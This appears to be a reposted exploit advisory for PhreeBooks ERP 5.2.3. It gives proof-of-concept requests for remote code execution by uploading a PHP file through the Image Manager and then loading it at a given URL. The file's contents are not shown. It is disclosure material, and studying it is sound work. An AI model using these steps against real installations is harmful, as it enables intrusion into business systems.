# PhreeBooks ERP 5.2.3 任意文件上傳漏洞
==EXP==
PhreeBooks ERP v5.2.3 - Arbitrary File Upload
# Date: 03.04.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage: https://www.phreesoft.com/
# Software Link: https://sourceforge.net/projects/phreebooks/files/latest/download
# Category: Webapps
# Version: 5.2.3
# Tested on: WAMPP @Win
# Software description:
PhreeBooks 5 is a completely new web based application that utilizes the
redesigned Bizuno ERP library from PhreeSoft. Bizuno supports PHP 7 along
with all the latest versions of mySQL. Additionally, Bizuno utilizes the
jQuery EasyUI graphical interface and will be also enhanced for mobile
devices and tablets.
# Vulnerabilities:
# An attacker could run a remote code after an authorized user login using
the parameter.
# Code Section @Tools>Image Manager
//
# POC - RCE via Arbitrary File Upload :
Process during upload malicious file;
http://localhost/PhreeBooksERP/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload
Post section details;
imgSearch=&imgFile=evilcode_key.php
Result;
http://localhost/PhreeBooksERP/bizunoFS.php?&src=0/images/evilcode_key.php
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容